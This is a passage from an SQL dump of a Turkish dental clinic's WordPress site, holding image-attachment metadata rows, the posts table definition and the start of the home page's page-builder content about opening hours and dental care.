(4856, 6534, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:294;s:4:\"file\";s:20:\"2018/07/danistay.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"danistay-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"danistay-300x147.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:147;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:20:\"danistay-350x294.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:20:\"danistay-600x294.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:20:\"danistay-600x294.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:20:\"danistay-600x294.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4857, 6535, '_wp_attached_file', '2018/07/sayistay.jpg'),
(4858, 6535, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:294;s:4:\"file\";s:20:\"2018/07/sayistay.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"sayistay-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"sayistay-300x147.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:147;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:20:\"sayistay-350x294.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:20:\"sayistay-600x294.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:20:\"sayistay-600x294.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:20:\"sayistay-600x294.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4859, 6536, '_wp_attached_file', '2018/07/yargitay.jpg'),
(4860, 6536, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:294;s:4:\"file\";s:20:\"2018/07/yargitay.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"yargitay-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"yargitay-300x147.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:147;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:20:\"yargitay-350x294.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:20:\"yargitay-600x294.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:20:\"yargitay-600x294.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:20:\"yargitay-600x294.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:294;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4861, 6539, '_wp_attached_file', '2018/07/aysegul-dalkiran-arslan-1.jpg'),
(4862, 6539, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:37:\"2018/07/aysegul-dalkiran-arslan-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"aysegul-dalkiran-arslan-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"aysegul-dalkiran-arslan-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:37:\"aysegul-dalkiran-arslan-1-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:37:\"aysegul-dalkiran-arslan-1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:37:\"aysegul-dalkiran-arslan-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4863, 6540, '_wp_attached_file', '2018/07/duygu-demir-1.jpg'),
(4864, 6540, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:25:\"2018/07/duygu-demir-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"duygu-demir-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"duygu-demir-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:25:\"duygu-demir-1-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:25:\"duygu-demir-1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:25:\"duygu-demir-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4865, 6541, '_wp_attached_file', '2018/07/zeki-erdogan-1.jpg'),
(4866, 6541, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:26:\"2018/07/zeki-erdogan-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"zeki-erdogan-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"zeki-erdogan-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:26:\"zeki-erdogan-1-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:26:\"zeki-erdogan-1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:26:\"zeki-erdogan-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4867, 6543, '_wp_attached_file', '2018/07/zeki-erdogan-ana-sayfa-1.jpg'),
(4868, 6543, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:316;s:4:\"file\";s:36:\"2018/07/zeki-erdogan-ana-sayfa-1.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"zeki-erdogan-ana-sayfa-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:36:\"zeki-erdogan-ana-sayfa-1-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:36:\"zeki-erdogan-ana-sayfa-1-350x316.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:316;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:36:\"zeki-erdogan-ana-sayfa-1-600x316.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:316;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:36:\"zeki-erdogan-ana-sayfa-1-600x316.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:316;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:36:\"zeki-erdogan-ana-sayfa-1-600x316.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:316;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4869, 6545, '_wp_attached_file', '2018/07/pers-1.jpg'),
(4870, 6545, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:18:\"2018/07/pers-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"pers-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"pers-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:18:\"pers-1-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:18:\"pers-1-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:18:\"pers-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4871, 6546, '_wp_attached_file', '2018/07/pers-2.jpg'),
(4872, 6546, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:18:\"2018/07/pers-2.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"pers-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"pers-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:18:\"pers-2-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:18:\"pers-2-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:18:\"pers-2-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4873, 6550, '_wp_attached_file', '2018/07/zeki-erdogan-9.jpg'),
(4874, 6550, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:26:\"2018/07/zeki-erdogan-9.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"zeki-erdogan-9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"zeki-erdogan-9-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:26:\"zeki-erdogan-9-350x350.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:26:\"zeki-erdogan-9-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:26:\"zeki-erdogan-9-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4878, 6553, '_wp_attached_file', '2018/08/anasayfa.jpg'),
(4879, 6553, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:600;s:6:\"height\";i:316;s:4:\"file\";s:20:\"2018/08/anasayfa.jpg\";s:5:\"sizes\";a:6:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"anasayfa-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"anasayfa-300x158.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:158;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:20:\"anasayfa-350x316.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:316;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:20:\"anasayfa-600x316.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:316;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:20:\"anasayfa-600x316.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:316;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:20:\"anasayfa-600x316.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:316;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4883, 6556, '_wp_attached_file', '2018/11/zfav.png'),
(4884, 6556, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:386;s:6:\"height\";i:385;s:4:\"file\";s:16:\"2018/11/zfav.png\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"zfav-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"zfav-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:16:\"zfav-350x350.png\";s:5:\"width\";i:350;s:6:\"height\";i:350;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4885, 6557, '_wp_attached_file', '2018/11/zlogo.png'),
(4886, 6557, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1039;s:6:\"height\";i:310;s:4:\"file\";s:17:\"2018/11/zlogo.png\";s:5:\"sizes\";a:7:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"zlogo-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"zlogo-300x90.png\";s:5:\"width\";i:300;s:6:\"height\";i:90;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"zlogo-1024x306.png\";s:5:\"width\";i:1024;s:6:\"height\";i:306;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"us_350_350_crop\";a:4:{s:4:\"file\";s:17:\"zlogo-350x310.png\";s:5:\"width\";i:350;s:6:\"height\";i:310;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"us_600_600_crop\";a:4:{s:4:\"file\";s:17:\"zlogo-600x310.png\";s:5:\"width\";i:600;s:6:\"height\";i:310;s:9:\"mime-type\";s:9:\"image/png\";}s:8:\"us_600_0\";a:4:{s:4:\"file\";s:17:\"zlogo-600x179.png\";s:5:\"width\";i:600;s:6:\"height\";i:179;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"us_600_400_crop\";a:4:{s:4:\"file\";s:17:\"zlogo-600x310.png\";s:5:\"width\";i:600;s:6:\"height\";i:310;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}');

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_posts`
--

CREATE TABLE `zdenl_posts` (
  `ID` bigint(20) UNSIGNED NOT NULL,
  `post_author` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `post_title` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `post_excerpt` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `post_status` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'open',
  `post_password` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `post_name` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `to_ping` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `pinged` text COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `post_parent` bigint(20) UNSIGNED NOT NULL DEFAULT '0',
  `guid` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT '0',
  `post_type` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT '0'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;

--
-- Tablo döküm verisi `zdenl_posts`
--

INSERT INTO `zdenl_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(8, 1, '2013-05-31 08:44:43', '2013-05-31 08:44:43', '[vc_row height=\"auto\" width=\"full\" color_scheme=\"primary\"][vc_column][rev_slider_vc alias=\"home\"][/vc_column][/vc_row][vc_row color_scheme=\"alternate\"][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"far|clock\" size=\"50px\" title=\"Çalışma Saatleri\" type=\"icon_left\" link_text=\"Learn More\"]Pazartesi - Cuma 09:00 - 19:00\r\nCumartesi 09:00 - 17:00[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"fas|certificate\" size=\"50px\" title=\"Uzman Hekimler\" type=\"icon_left\" link_text=\"Learn More\"]Alanlarında uzman doktorlarımız, sağlığınız için, size daha iyi hizmet edebilmek için buradalar…[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"fas|graduation-cap\" size=\"50px\" title=\"Tecrübe\" type=\"icon_left\" link_text=\"Learn More\"]20 yılı aşkın tecrübemizle sizlere hizmet veriyoruz.[/us_iconbox][/vc_column][vc_column width=\"1/2\" offset=\"vc_col-md-3\"][us_iconbox icon=\"far|smile\" size=\"50px\" title=\"Memnuniyet\" type=\"icon_left\" link_text=\"Learn More\"]Önceliğimiz tartışmasız hasta sağlığı ve memnuniyetidir.[/us_iconbox][/vc_column][/vc_row][vc_row content_placement=\"middle\" gap=\"20\" color_scheme=\"primary\" us_bg_image=\"6417\" us_bg_parallax=\"vertical\" us_bg_overlay_color=\"rgba(30,30,30,0.75)\"][vc_column animate=\"afb\" width=\"1/2\"][vc_column_text]\r\n<h2>Diş Hekimi Zeki ERDOĞAN</h2>\r\nDişlerinizin genel durumunun iyileştirilmesi, hem sağlığınız hem de estetik kaygıların önüne geçmeniz açısından çok önemlidir.\r\nDişlerinizde etkili çözümler ve tam kapsamlı bir tedavi için ağız yapısı doğru incelenmeli, gerçekleştirilmesi gereken tedavi yöntemleri belirlenmeli ve etkili bir yol haritası izlenmelidir. Ağız sağlığınıza çok yönlü fayda sunan tedavi yöntemleri ile her açıdan güvenli çözümler elde edin.[/vc_column_text][/vc_column][vc_column animate=\"afb\" animate_delay=\"0.2\" width=\"1/2\"][us_single_image image=\"6553\" size=\"full\" align=\"center\"][/vc_column][/vc_row][vc_row height=\"auto\" width=\"full\" color_scheme=\"primary\" overlay=\"black_30\" el_id=\"portfolio\"][vc_column][us_grid post_type=\"us_portfolio\" type=\"carousel\" columns=\"6\" items_gap=\"\" items_quantity=\"\" items_layout=\"6416\" carousel_arrows=\"1\" carousel_autoplay=\"1\"][/vc_column][/vc_row][vc_row height=\"large\"][vc_column animate=\"afb\"][vc_column_text]\r\n<h2 style=\"text-align: center;\">diş bakımı ihmale 